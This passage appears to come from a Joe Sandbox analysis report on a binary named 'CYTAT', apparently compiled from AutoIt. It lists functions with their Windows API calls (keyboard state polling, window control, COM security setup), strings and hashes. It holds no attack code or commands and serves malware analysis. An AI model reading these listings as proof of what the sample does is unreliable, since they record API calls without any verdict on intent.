                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                • __swprintf.LIBCMT ref: 0045E7F7
                                                • _wprintf.LIBCMT ref: 0045E8B3
                                                • _wprintf.LIBCMT ref: 0045E8D7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                • API String ID: 2295938435-2354261254
                                                • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __swprintf_wcscpy$__i64tow__itow
                                                • String ID: %.15g$0x%p$False$True
                                                • API String ID: 3038501623-2263619337
                                                • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                • __swprintf.LIBCMT ref: 0045E5F6
                                                • _wprintf.LIBCMT ref: 0045E6A3
                                                • _wprintf.LIBCMT ref: 0045E6C7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                • API String ID: 2295938435-8599901
                                                • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • timeGetTime.WINMM ref: 00443B67
                                                  • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                • SetActiveWindow.USER32(?), ref: 00443BEC
                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                • IsWindow.USER32(?), ref: 00443C3A
                                                • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                • String ID: BUTTON
                                                • API String ID: 1834419854-3405671355
                                                • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                • LoadStringW.USER32(00000000), ref: 00454040
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • _wprintf.LIBCMT ref: 00454074
                                                • __swprintf.LIBCMT ref: 004540A3
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                • API String ID: 455036304-4153970271
                                                • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                                Download Yara Rule
                                                APIs
                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                • _memmove.LIBCMT ref: 00467EB8
                                                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                • _memmove.LIBCMT ref: 00467F6C
                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                • String ID:
                                                • API String ID: 2170234536-0
                                                • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 00453CE0
                                                • SetKeyboardState.USER32(?), ref: 00453D3B
                                                • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                • GetKeyState.USER32(000000A0), ref: 00453D75
                                                • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                • GetKeyState.USER32(00000011), ref: 00453DEF
                                                • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                • GetKeyState.USER32(00000012), ref: 00453E26
                                                • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$ItemMoveRect$Invalidate
                                                • String ID:
                                                • API String ID: 3096461208-0
                                                • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                • DeleteObject.GDI32(?), ref: 0047151E
                                                • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                • DeleteObject.GDI32(?), ref: 004715EA
                                                • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                • String ID:
                                                • API String ID: 3218148540-0
                                                • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                • String ID:
                                                • API String ID: 136442275-0
                                                • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                                Download Yara Rule
                                                APIs
                                                • _wcsncpy.LIBCMT ref: 00467490
                                                • _wcsncpy.LIBCMT ref: 004674BC
                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                • _wcstok.LIBCMT ref: 004674FF
                                                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                • _wcstok.LIBCMT ref: 004675B2
                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                • _wcslen.LIBCMT ref: 00467793
                                                • _wcscpy.LIBCMT ref: 00467641
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • _wcslen.LIBCMT ref: 004677BD
                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                • String ID: X
                                                • API String ID: 3104067586-3081909835
                                                • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                • _wcslen.LIBCMT ref: 0046CDB0
                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                  • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                  • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                  • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                Strings
                                                • NULL Pointer assignment, xrefs: 0046CEA6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                • String ID: NULL Pointer assignment
                                                • API String ID: 440038798-2785691316
                                                • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                Download Yara Rule
